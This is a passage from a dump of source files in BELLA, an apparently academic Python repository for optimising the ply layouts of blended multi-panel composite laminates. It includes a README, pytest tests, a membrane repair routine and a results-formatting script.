{self.N_x}\r\nLoad intensity in th y-direction : {self.N_y}\r\nPosition of potential middle ply : {self.middle_ply_index}\r\n \"\"\" + to_disp\r\n\r\n#Lamination-parameter weighting in the panel objective function:\r\n# during blending steps 3 and 4.1\r\n# A : {self.lampam_weightings[0:4]}\r\n# B : {self.lampam_weightings[4:8]}\r\n# D : {self.lampam_weightings[8:12]}\r\n# during blending steps 4.2 and 4.3\r\n# A : {self.lampam_weightings2[0:4]}\r\n# B : {self.lampam_weightings2[4:8]}\r\n# D : {self.lampam_weightings2[8:12]}\r\n\r\n\r\nclass PanelDefinitionError(Exception):\r\n \" Errors during the definition of a panel\"\r\n\r\nif __name__ == \"__main__\":\r\n print('*** Test for the class Panel ***\\n')\r\n constraints = Constraints(sym=True)\r\n panel1 = Panel(1, constraints, n_plies=12)\r\n print(panel1)\r\n"
},
{
"alpha_fraction": 0.5832300782203674,
"alphanum_fraction": 0.5873606204986572,
"avg_line_length": 33.09859085083008,
"blob_id": "680f0832feba1c2ce1f394c481597ffcdb88e03e",
"content_id": "52abc1b60e9934cb88cba20f38ef6b68fdf19074",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2422,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 71,
"path": "/README.md",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# BELLA: a method to design blended multi-panel composite laminates with many plies and panels\n\n--------------------------------------------------------------------------\n\nThe files correspond to the PhD Thesis of Noémie Fedon.\n\nBELLA is a method for optimising the layout of composite laminate strucutres when panel \nthicknesses are fixed. The algorithm enforoces lay-up and ply-drop design guidelines and \noptimise panel convergence towards lamination-paramter targets.\n\n--------------------------------------------------------------------------\nRequirements:\n\n1. A python IDE running python 3.7+\n\n2. The following libraries should accessible:\n\n\t- matplotlib\n\t- pandas\n\t- numpy\n\n---------------------------------------------------------------------------\nIn order to use it:\n\n1. clone or download the repository in your desired folder.\n\n2. Set up your environment with the appropriate libraries.\n\n3. Change the settings and run one of the files used to test LAYLA: \nrun_BELLA.py, run_BELLA_from_input_file.py, run_BELLA_from_input_file_horseshoe.py \n\nRefer to the documentation for more details.\n--------------------------------------------------------------------------\nFolder Structure\n\n- src and subfolders contain the files needed to run the code\n\n- input-files contains the files storing the input-files used for testing LAYLA\n\n- results contains the results and analyses generated for the thesis.\n\n- FXI-results contains the results generated using the evolutionary algorithm of \nFrançois-Xavier Irisarri.\n\n- run_BELLA.py is used for to run BELLA without using an input-file.\n\n- run_BELLA_from_input_file.py is used for testing BELLA based on input-files.\n\n- run_BELLA_from_input_file_horseshoe.py is used for testing BELLA based on input-files \nspecific to the benchmark problem of composite-laminate design.\n\n--------------------------------------------------------------------------\nVersion 1.0.0\n\n--------------------------------------------------------------------------\nLicense\n\nThis project is licensed under the MIT License. See the LICENSE for details.\n\n--------------------------------------------------------------------------\nAcknowledgments\n\n- Terence Macquart, Paul Weaver and Alberto Pirrera, my PhD supervisors.\n\n--------------------------------------------------------------------------\nAuthor:\n\nNoémie Fedon\n\nFor any questions or feedback don't hesitate to contact me at: [email protected]\nor through github at https://github.com/noemiefedon/BELLA\n"
},
{
"alpha_fraction": 0.529891312122345,
"alphanum_fraction": 0.5760869383811951,
"avg_line_length": 25.33333396911621,
"blob_id": "1950ab9d82e05008c03a7b766d4cc60cdb7e1472",
"content_id": "12d27365de889eea6a1049a03dd12323875aa705",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 736,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 27,
"path": "/src/divers/test_arrays.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis module test the functions for manipulating and combining Python arrays.\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport pytest\r\nimport numpy as np\r\n\r\nfrom arrays import max_arrays\r\n\r\[email protected](\r\n \"array1, array2, expect\", [\r\n (np.array([1]), np.array([4, 3, 5]), np.array([4, 3, 5])),\r\n (np.array([1, 2, 3]), np.array([4, 3, 5]), np.array([4, 3, 5]))\r\n ])\r\n\r\ndef test_max_arrays(array1, array2, expect):\r\n output = max_arrays(array1, array2)\r\n assert (output == expect).all()\r\n\r\ndef test_max_arrays_error():\r\n array1 = np.array([1, 2])\r\n array2 = np.array([1, 2, 3])\r\n with pytest.raises(ValueError):\r\n max_arrays(array1, array2)"
},
{
"alpha_fraction": 0.5201858878135681,
"alphanum_fraction": 0.5739542245864868,
"avg_line_length": 35.578765869140625,
"blob_id": "54b2486c94416a0191ada2751dc1950e00875053",
"content_id": "8094363db9b7de721fd564203cde21e8b6c68f02",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10973,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 292,
"path": "/src/RELAY/repair_membrane_1_no_ipo.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\n- calc_objA_options\r\n calculates the possible in-plane objective function values achievable by\r\n modifying one fibre orientation\r\n\r\n- calc_objA_options_3\r\n calculates the possible in-plane objective function values achievable by\r\n modifying one fibre orientation\r\n\r\n \"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport math as ma\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.divers.sorting import sortAccording\r\nfrom src.LAYLA_V02.constraints import Constraints\r\nfrom src.divers.pretty_print import print_ss\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.RELAY.repair_10_bal import calc_mini_10\r\nfrom src.RELAY.repair_tools import RepairError\r\n\r\ndef repair_membrane_1_no_ipo(\r\n ss_ini, ply_queue_ini, mini_10, in_plane_coeffs,\r\n p_A, lampam_target, constraints):\r\n \"\"\"\r\n repair for membrane properties only accounting for one panel when the\r\n laminate does not have to remain balanced\r\n\r\n modifies the stacking sequence to converge towards the in-plane target\r\n lamination parameters. The modifications preserves the satisfaction to the\r\n 10% rule, to the balance requirements and to the damage tolerance\r\n constraints.\r\n\r\n The fibre orientations are modified one by one.\r\n\r\n INPUTS\r\n\r\n - ss_ini: partially retrieved stacking sequence\r\n - ply_queue_ini: queue of plies for innermost plies\r\n - mini_10: number of plies required for the 10 % rule in the 0/90/45/-45\r\n fibre directions\r\n - in_plane_coeffs: coefficients in the in-plane objective function\r\n - p_A: coefficient for the proportion\r\n of the laminate thickness that can be modified during the repair\r\n for membrane properties\r\n - lampam_target: lamination parameter targets\r\n - constraints: design and manufacturing constraints\r\n - p_A: coefficient for the\r\n proportion of the laminate thickness that can be modified during the repair\r\n for membrane properties\r\n \"\"\"\r\n n_plies = ss_ini.size\r\n\r\n ss = np.copy(ss_ini)\r\n ply_queue = ply_queue_ini[:]\r\n\r\n lampamA = calc_lampamA_ply_queue(ss, n_plies, ply_queue, constraints)\r\n objA = sum(in_plane_coeffs * ((lampamA - lampam_target[0:4]) ** 2))\r\n# print('objA', objA)\r\n\r\n ss_list = [np.copy(ss)]\r\n ply_queue_list = [ply_queue[:]]\r\n lampamA_list = [lampamA]\r\n objA_list = [objA]\r\n\r\n excess_10 = calc_excess_10(ss, ply_queue, mini_10, constraints.sym)\r\n\r\n indices_1, indices_per_angle = calc_ind_plies(\r\n ss, n_plies, ply_queue, constraints, p_A)\r\n indices_to_sort = list(indices_1)\r\n indices_to_sort.insert(0, -1)\r\n# print('indices_1', list(indices_1))\r\n# print('indices_per_angle', list(indices_per_angle))\r\n# print('indices_to_sort', indices_to_sort)\r\n\r\n lampamA_options = calc_lampamA_options_3(n_plies, constraints)\r\n objA_options = calc_objA_options_3(\r\n lampamA, lampamA_options, lampam_target, constraints, in_plane_coeffs)\r\n# print('objA_options', objA_options)\r\n\r\n while np.min(objA_options) + 1e-20 < objA and objA > 1e-10:\r\n # attempts at modifying a couple of angled plies\r\n ind_angle1, ind_angle2 = np.unravel_index(\r\n np.argmin(objA_options, axis=None), objA_options.shape)\r\n angle1 = constraints.set_of_angles[ind_angle1]\r\n angle2 = constraints.set_of_angles[ind_angle2]\r\n# print('test angle1', angle1, 'to angle2', angle2)\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n# print('indices_per_angle', indices_per_angle)\r\n\r\n # if no ply to be deleted\r\n if len(indices_per_angle[ind_angle1]) < 1:\r\n objA_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n\r\n # attention to not break the 10% rule\r\n if angle1 == 0:\r\n if excess_10[0] < 1:\r\n objA_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n excess_10[0] -= 1\r\n elif angle1 == 90:\r\n if excess_10[1] < 1:\r\n objA_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n excess_10[1] -= 1\r\n elif angle1 == 45:\r\n if excess_10[2] < 1:\r\n objA_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n excess_10[2] -= 1\r\n elif angle1 == -45:\r\n if excess_10[3] < 1:\r\n objA_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n excess_10[3] -= 1\r\n\r\n# print(angle1, ' plies changed into ', angle2, 'plies')\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n# print('indices_per_angle[ind_angle1]', indices_per_angle[ind_angle1])\r\n# print('indices_per_angle[ind_angle2]', indices_per_angle[ind_angle2])\r\n\r\n if angle2 == 0:\r\n excess_10[0] += 1\r\n elif angle2 == 90:\r\n excess_10[1] += 1\r\n elif angle2 == 45:\r\n excess_10[2] += 1\r\n elif angle2 == -45:\r\n excess_10[3] += 1\r\n\r\n lampamA += lampamA_options[ind_angle2] - lampamA_options[ind_angle1]\r\n objA = objA_options[ind_angle1, ind_angle2]\r\n\r\n # modification of the stacking sequence\r\n ind_ply_1 = indices_per_angle[ind_angle1].pop(0)\r\n# print('ind_ply_1', ind_ply_1)\r\n\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(angle1)\r\n ply_queue.append(angle2)\r\n else:\r\n ss[ind_ply_1] = angle2\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n\r\n ss_list.insert(0, np.copy(ss))\r\n ply_queue_list.insert(0, ply_queue[:])\r\n lampamA_list.insert(0, np.copy(lampamA))\r\n objA_list.insert(0, objA)\r\n\r\n indices_per_angle[ind_angle2].append(ind_ply_1)\r\n if constraints.sym:\r\n indices_per_angle[ind_angle2].sort(reverse=True)\r\n else:\r\n sortAccording(indices_per_angle[ind_angle2], indices_to_sort)\r\n indices_per_angle[ind_angle2].reverse()\r\n\r\n# print('indices_per_angle', indices_per_angle)\r\n# print('objA', objA)\r\n if objA < 1e-10:\r\n break\r\n\r\n objA_options = calc_objA_options_3(\r\n lampamA, lampamA_options, lampam_target, constraints,\r\n in_plane_coeffs)\r\n# print('objA_options', objA_options)\r\n\r\n return ss_list, ply_queue_list, lampamA_list, objA_list\r\n\r\n\r\n\r\ndef calc_objA_options_3(\r\n lampamA, lampamA_options, lampam_target, constraints, in_plane_coeffs):\r\n \"\"\"\r\n calculates the possible in-plane objective function values achievable by\r\n modifying one fibre orientation\r\n\r\n objA_options[ind_pos_angle1, ind_pos_angle2] for angle1 ply changed\r\n to angle2 plies\r\n \"\"\"\r\n objA_options = 1e10*np.ones((constraints.n_set_of_angles,\r\n constraints.n_set_of_angles), float)\r\n for ind_pos_angle1 in range(constraints.n_set_of_angles):\r\n for ind_pos_angle2 in range(constraints.n_set_of_angles):\r\n if ind_pos_angle1 == ind_pos_angle2:\r\n continue\r\n objA_options[ind_pos_angle1, ind_pos_angle2] = sum(\r\n in_plane_coeffs *((\r\n lampamA \\\r\n - lampamA_options[ind_pos_angle1] \\\r\n + lampamA_options[ind_pos_angle2] \\\r\n - lampam_target[0:4])**2))\r\n return objA_options\r\n\r\n\r\ndef calc_excess_10(ss, ply_queue, mini_10, sym):\r\n \"\"\"\r\nreturns the current number of plies in the 0/90/+45/-45 directions\r\n\r\n INPUTS\r\n\r\n ss: stacking sequence (array)\r\n sym: True for symmetric laminates (boolean)\r\n \"\"\"\r\n ply_queue = np.array(ply_queue)\r\n current_10 = np.zeros((5,), float)\r\n if sym:\r\n lenn = ss.size // 2\r\n current_10[0] = sum(ss[:lenn] == 0) + sum(ply_queue == 0)\r\n current_10[1] = sum(ss[:lenn] == 90) + sum(ply_queue == 90)\r\n current_10[2] = sum(ss[:lenn] == 45) + sum(ply_queue == 45)\r\n current_10[3] = sum(ss[:lenn] == -45) + sum(ply_queue == -45)\r\n current_10[4] = current_10[2] + current_10[3]\r\n if ss.size % 2:\r\n if ss[lenn] == 0:\r\n current_10[0] += 1/2\r\n elif ss[lenn] == 90:\r\n current_10[1] += 1/2\r\n else:\r\n raise RepairError(\"\"\"\r\nThis should not happen, plies at the midle surface at another fibre orientation\r\nthan 0 or 90 deg\"\"\")\r\n else:\r\n current_10[0] = sum(ss == 0) + sum(ply_queue == 0)\r\n current_10[1] = sum(ss == 90) + sum(ply_queue == 90)\r\n current_10[2] = sum(ss == 45) + sum(ply_queue == 45)\r\n current_10[3] = sum(ss == -45) + sum(ply_queue == -45)\r\n current_10[4] = current_10[2] + current_10[3]\r\n return current_10 - mini_10\r\n\r\nif __name__ == \"__main__\":\r\n\r\n print('\\n\\n*** Test for the function calc_excess_10 ***')\r\n constraints = Constraints(\r\n sym=True,\r\n ipo=True,\r\n dam_tol=False,\r\n rule_10_percent=True,\r\n percent_0=10,\r\n percent_45=10,\r\n percent_90=10,\r\n percent_135=10,\r\n set_of_angles=[0, 45, 30, -30, -45, 60, -60, 90])\r\n ss = np.array([0, 45, 666, 666, 666, 666, 666, 666, 666,\r\n 666, 666, 666, 666, 666, 666, 666, 45, 0], int)\r\n ply_queue = [90, 90, -45, 90, 90, 45, 0]\r\n mini_10 = calc_mini_10(constraints, ss.size)\r\n print('\\nInitial stacking sequence')\r\n print_ss(ss, 40)\r\n excess_10 = calc_excess_10(ss, ply_queue, mini_10, sym=constraints.sym)\r\n print('\\nexcess_10', excess_10)\r\n\r\n print('\\n*** Test for the function repair_membrane_1_no_ipo ***')\r\n constraints = Constraints(\r\n sym=True,\r\n ipo=False,\r\n dam_tol=False,\r\n rule_10_percent=True,\r\n percent_0=10,\r\n percent_45=10,\r\n percent_90=10,\r\n percent_135=10,\r\n set_of_angles=[0, 45, -45, 90])\r\n# set_of_angles=[0, 45, 30, -30, 60, -60, -45, 90])\r\n p_A = 100\r\n in_plane_coeffs = np.array([1, 1, 0, 0])\r\n ss_target = np.array([0], int)\r\n print('\\nTarget stacking sequence')\r\n print_ss(ss_target, 40)\r\n lampam_target = calc_lampam(ss_target)\r\n ss = np.array([0, 45, 666, 666, 666, 666, 666, 666, 666,\r\n 666, 666, 666, 666, 666, 666, 666, 45, 0], int)\r\n ply_queue = [90, 90, -45, 90, 90, 45, 0]\r\n# ss = np.array([60, 45, 0, 0, 30, 0, -30,\r\n# -30, 0, 30, 0, 0, 45, 60], int)\r\n# ply_queue = []\r\n print('\\nInitial stacking sequence')\r\n print_ss(ss, 40)\r\n mini_10 = calc_mini_10(constraints, ss.size)\r\n ss_list, ply_queue_list, lampamA_list, objA_list = repair_membrane_1_no_ipo(\r\n ss, ply_queue, mini_10, in_plane_coeffs,\r\n p_A, lampam_target, constraints)\r\n print('\\nSolution stacking sequences')\r\n for index in range(len(ss_list)):\r\n print_ss(ss_list[index], 20)\r\n print(ply_queue_list[index], 20)\r\n"
},
{
"alpha_fraction": 0.6522427797317505,
"alphanum_fraction": 0.6737300753593445,
"avg_line_length": 37.30350112915039,
"blob_id": "bbc61045830b15a85973604c987cdfab6ff043d6",
"content_id": "bb2fa56bb3eda62110e91d0fad9640863c2a1a6a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10099,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 257,
"path": "/FXI-results/format_restults_FXI_horseshoe.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script formats the results of blending optimisations the optimiser of\r\nFrancois-Xavier Irisarri\r\n\"\"\"\r\n\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport pandas as pd\r\nimport numpy as np\r\nimport numpy.matlib\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.BELLA.materials import Material\r\nfrom src.BELLA.results import BELLA_Results\r\nfrom src.BELLA.results import BELLA_ResultsOnePdl\r\nfrom src.BELLA.format_pdl import convert_sst_to_ss\r\nfrom src.guidelines.ipo_oopo import calc_penalty_oopo_ss\r\nfrom src.guidelines.ipo_oopo import calc_penalty_ipo\r\nfrom src.guidelines.contiguity import calc_penalty_contig_mp\r\nfrom src.guidelines.disorientation import calc_number_violations_diso_mp\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_pc\r\nfrom src.guidelines.ten_percent_rule import calc_ply_counts\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_ss\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\nfrom src.BELLA.save_set_up import save_constraints_BELLA\r\nfrom src.BELLA.save_set_up import save_multipanel, save_objective_function_BELLA\r\nfrom src.BELLA.save_set_up import save_materials\r\nfrom src.BELLA.save_result import save_result_BELLAs\r\nfrom src.divers.excel import delete_file, autofit_column_widths\r\n\r\nfilename = 'horseshoe.xlsx'\r\n# filename = 'horseshoe2.xlsx'\r\nfilename_input = '/BELLA/input-files/input_file_' + filename\r\nfilename_FXI = '/BELLA/FXI-results/result_FXI_' + filename\r\nfilename_res = 'results_FXI_' + filename\r\n\r\n# check for authorisation before overwriting\r\ndelete_file(filename_res)\r\n\r\n### Design guidelines ---------------------------------------------------------\r\n\r\ndata_constraints = pd.read_excel(filename_input, sheet_name='Constraints',\r\n header=None, index_col=0).T\r\nsym = data_constraints[\"symmetry\"].iloc[0]\r\nbal = data_constraints[\"balance\"].iloc[0]\r\noopo = data_constraints[\"out-of-plane orthotropy\"].iloc[0]\r\ndam_tol = data_constraints[\"damage tolerance\"].iloc[0]\r\ndam_tol_rule = int(data_constraints[\"dam_tol_rule\"].iloc[0])\r\ncovering = data_constraints[\"covering\"].iloc[0]\r\nn_covering = int(data_constraints[\"n_covering\"].iloc[0])\r\nrule_10_percent = data_constraints[\"10% rule\"].iloc[0]\r\nrule_10_Abdalla = data_constraints[\"10% rule applied on LPs\"].iloc[0]\r\npercent_Abdalla = float(data_constraints[\r\n \"percentage limit when rule applied on LPs\"].iloc[0])\r\npercent_0 = float(data_constraints[\"percent_0\"].iloc[0])\r\npercent_45 = float(data_constraints[\"percent_45\"].iloc[0])\r\npercent_90 = float(data_constraints[\"percent_90\"].iloc[0])\r\npercent_135 = float(data_constraints[\"percent_-45\"].iloc[0])\r\npercent_45_135 = float(data_constraints[\"percent_+-45\"].iloc[0])\r\ndiso = data_constraints[\"diso\"].iloc[0]\r\ndelta_angle = float(data_constraints[\"delta_angle\"].iloc[0])\r\ncontig = data_constraints[\"contig\"].iloc[0]\r\nn_contig = int(data_constraints[\"n_contig\"].iloc[0])\r\nset_of_angles = np.array(\r\n data_constraints[\"fibre orientations\"].iloc[0].split(\" \"), int)\r\npdl_spacing = data_constraints[\"ply drop spacing rule\"].iloc[0]\r\nmin_drop = int(data_constraints[\r\n \"minimum number of continuous plies between ply drops\"].iloc[0])\r\nconstraints = Constraints(\r\n sym=sym,\r\n bal=bal,\r\n oopo=oopo,\r\n dam_tol=dam_tol,\r\n dam_tol_rule=dam_tol_rule,\r\n covering=covering,\r\n n_covering=n_covering,\r\n rule_10_percent=rule_10_percent,\r\n rule_10_Abdalla=rule_10_Abdalla,\r\n percent_Abdalla=percent_Abdalla,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n diso=diso,\r\n contig=contig,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n set_of_angles=set_of_angles,\r\n min_drop=min_drop,\r\n pdl_spacing=pdl_spacing)\r\n\r\n### Material properties -------------------------------------------------------\r\n\r\ndata_materials = pd.read_excel(filename_input, sheet_name='Materials',\r\n header=None, index_col=0).T\r\nE11 = data_materials[\"E11\"].iloc[0]\r\nE22 = data_materials[\"E22\"].iloc[0]\r\nnu12 = data_materials[\"nu12\"].iloc[0]\r\nG12 = data_materials[\"G12\"].iloc[0]\r\ndensity_area = data_materials[\"areal density\"].iloc[0]\r\nply_t = data_materials[\"ply thickness\"].iloc[0]\r\nmaterials = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n\r\n### Objective function parameters ---------------------------------------------\r\n\r\ndata_objective = pd.read_excel(filename_input, sheet_name='Objective function',\r\n header=None, index_col=0).T\r\ncoeff_10 = data_objective[\"coeff_10\"].iloc[0]\r\ncoeff_contig = data_objective[\"coeff_contig\"].iloc[0]\r\ncoeff_diso = data_objective[\"coeff_diso\"].iloc[0]\r\ncoeff_oopo = data_objective[\"coeff_oopo\"].iloc[0]\r\ncoeff_spacing = data_objective[\"coeff_spacing\"].iloc[0]\r\n\r\nobj_func_param = ObjFunction(\r\n constraints=constraints,\r\n coeff_contig=coeff_contig,\r\n coeff_diso=coeff_diso,\r\n coeff_10=coeff_10,\r\n coeff_oopo=coeff_oopo,\r\n coeff_spacing=coeff_spacing)\r\n\r\n### Multi-panel composite laminate layout -------------------------------------\r\n\r\ndata_panels = pd.read_excel(filename_input, sheet_name='Panels')\r\n\r\nlampam_weightings_all = data_panels[[\r\n \"lampam_weightings[1]\", \"lampam_weightings[2]\", \"lampam_weightings[3]\",\r\n \"lampam_weightings[4]\", \"lampam_weightings[5]\", \"lampam_weightings[6]\",\r\n \"lampam_weightings[7]\", \"lampam_weightings[8]\", \"lampam_weightings[9]\",\r\n \"lampam_weightings[10]\", \"lampam_weightings[11]\", \"lampam_weightings[12]\"]]\r\n\r\nlampam_targets_all = data_panels[[\r\n \"lampam_target[1]\", \"lampam_target[2]\", \"lampam_target[3]\",\r\n \"lampam_target[4]\", \"lampam_target[5]\", \"lampam_target[6]\",\r\n \"lampam_target[7]\", \"lampam_target[8]\", \"lampam_target[9]\",\r\n \"lampam_target[10]\", \"lampam_target[11]\", \"lampam_target[12]\"]]\r\n\r\npanels = []\r\nfor ind_panel in range(data_panels.shape[0]):\r\n panels.append(Panel(\r\n ID=int(data_panels[\"Panel ID\"].iloc[ind_panel]),\r\n lampam_target=np.array(lampam_targets_all.iloc[ind_panel], float),\r\n lampam_weightings=np.array(lampam_weightings_all.iloc[ind_panel], float),\r\n n_plies=int(data_panels[\"Number of plies\"].iloc[ind_panel]),\r\n weighting=float(data_panels[\r\n \"Weighting in MP objective funtion\"].iloc[ind_panel]),\r\n neighbour_panels=np.array(data_panels[\r\n \"Neighbour panel IDs\"].iloc[ind_panel].split(\" \"), int),\r\n constraints=constraints,\r\n length_x=float(data_panels[\"Length_x\"].iloc[ind_panel]),\r\n length_y=float(data_panels[\"Length_y\"].iloc[ind_panel]),\r\n N_x=float(data_panels[\"N_x\"].iloc[ind_panel]),\r\n N_y=float(data_panels[\"N_y\"].iloc[ind_panel])))\r\n\r\nmultipanel = MultiPanel(panels)\r\nmultipanel.filter_lampam_weightings(constraints, obj_func_param)\r\n\r\n### Organise the data structures of the results of FXI ------------------------\r\n\r\n\r\nsst_all = pd.read_excel(filename_FXI, sheet_name='Best result FXI').fillna(-1)\r\nsst_all = np.array(sst_all, int).T\r\n\r\ndic_n_plies_sst = {}\r\nfor line in sst_all:\r\n n_plies = line[line != -1].size\r\n dic_n_plies_sst[n_plies] = line\r\n\r\nsst = []\r\n\r\nfor panel in multipanel.panels:\r\n sst.append(dic_n_plies_sst[panel.n_plies])\r\nsst = np.array(sst)\r\n\r\n# remove unecessary -1\r\nfor ind in range(sst.shape[1])[::-1]:\r\n if (sst[:, ind] == -1).all():\r\n sst = np.delete(sst, np.s_[ind], axis=1)\r\n\r\nss = convert_sst_to_ss(sst)\r\n\r\n# lamination parameters\r\nlampam = np.array([calc_lampam(ss[ind_panel]) \\\r\n for ind_panel in range(multipanel.n_panels)])\r\n\r\n# disorientaion - penalty used in blending steps 4.2 and 4.3\r\nn_diso = calc_number_violations_diso_mp(ss, constraints)\r\nif constraints.diso and n_diso.any():\r\n penalty_diso = n_diso\r\nelse:\r\n penalty_diso = np.zeros((multipanel.n_panels,))\r\n\r\n# contiguity - penalty used in blending steps 4.2 and 4.3\r\nn_contig = calc_penalty_contig_mp(ss, constraints)\r\nif constraints.contig and n_contig.any():\r\n penalty_contig = n_contig\r\nelse:\r\n penalty_contig = np.zeros((multipanel.n_panels,))\r\n\r\n# 10% rule - no penalty used in blending steps 4.2 and 4.3\r\nif constraints.rule_10_percent and constraints.rule_10_Abdalla:\r\n penalty_10 = calc_penalty_10_ss(ss, constraints, lampam, mp=True)\r\nelse:\r\n penalty_10 = calc_penalty_10_pc(\r\n calc_ply_counts(multipanel, ss, constraints), constraints)\r\n\r\n# balance\r\npenalty_bal_ipo = calc_penalty_ipo(lampam)\r\n\r\n# out-of-plane orthotropy\r\npenalty_oopo = calc_penalty_oopo_ss(lampam, constraints=constraints)\r\n\r\n# penalty_spacing\r\npenalty_spacing = calc_penalty_spacing(\r\n pdl=sst,\r\n multipanel=multipanel,\r\n constraints=constraints,\r\n on_blending_strip=False)\r\n\r\nresults = BELLA_Results(constraints, multipanel)\r\nresults_one_pdl = BELLA_ResultsOnePdl()\r\n\r\nresults_one_pdl.ss = ss\r\nresults_one_pdl.lampam = lampam\r\nresults_one_pdl.penalty_diso = penalty_diso\r\nresults_one_pdl.penalty_contig = penalty_contig\r\nresults_one_pdl.penalty_10 = penalty_10\r\nresults_one_pdl.penalty_bal_ipo = penalty_bal_ipo\r\nresults_one_pdl.penalty_oopo = penalty_oopo\r\nresults_one_pdl.penalty_spacing = penalty_spacing\r\nresults_one_pdl.n_diso = n_diso\r\nresults_one_pdl.n_contig = n_contig\r\nresults_one_pdl.sst = sst\r\n\r\nresults.update(0, results_one_pdl)\r\nresults.lampam = lampam\r\nresults.sst = sst\r\nresults.ss = ss\r\n\r\n### Save data -----------------------------------------------------------------\r\nsave_constraints_BELLA(filename_res, constraints)\r\nsave_materials(filename_res, materials)\r\nsave_objective_function_BELLA(filename_res, obj_func_param)\r\nsave_multipanel(filename_res, multipanel, obj_func_param, materials)\r\nsave_result_BELLAs(filename_res, multipanel, constraints, None,\r\n obj_func_param, None, results, materials, only_best=True)\r\nautofit_column_widths(filename_res)"
},
{
"alpha_fraction": 0.5623431205749512,
"alphanum_fraction": 0.5740585923194885,
"avg_line_length": 27.875,
"blob_id": "0f434c6aef3cad3aa97915b6f037b3dc182e1c77",
"content_id": "a4d545cdffbe647672889f22f18c083c0ba11fba",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1195,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 40,
"path": "/src/BELLA/ply_order.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions to calculate the order in which plies are optimised\r\n\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\ndef calc_ply_order(multipanel, constraints):\r\n \"\"\"\r\n calulates the order in which plies are optimised\r\n\r\n OUTPUTS\r\n\r\n - ply_order[ind_panel]: array of the ply indices sorted in the order in\r\n which plies are optimised (middle ply of symmetric laminates included)\r\n\r\n INPUTS\r\n\r\n - constraints: lay-up design guidelines\r\n - multipanel: multi-panel structure\r\n \"\"\"\r\n ply_order = []\r\n\r\n for panel in multipanel.reduced.panels:\r\n if constraints.sym:\r\n ply_order.append(\r\n np.arange(panel.n_plies // 2 + panel.n_plies % 2))\r\n else:\r\n order_before_sorting = np.arange(panel.n_plies)\r\n ply_order_new = np.zeros((panel.n_plies,), int)\r\n ply_order_new[0::2] = order_before_sorting[\r\n :panel.n_plies // 2 + panel.n_plies % 2]\r\n ply_order_new[1::2] = order_before_sorting[\r\n panel.n_plies // 2 + panel.n_plies % 2:][::-1]\r\n ply_order.append(ply_order_new)\r\n\r\n return ply_order\r\n"
},
{
"alpha_fraction": 0.6048428416252136,
"alphanum_fraction": 0.6241703629493713,
"avg_line_length": 39.180179595947266,
"blob_id": "89c6afa0320968989cd08521c35bc1f4f0756bfe",
"content_id": "ffcff803eaf951d110a46fbe024138cc19df2810",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13711,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 333,
"path": "/src/BELLA/save_set_up.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
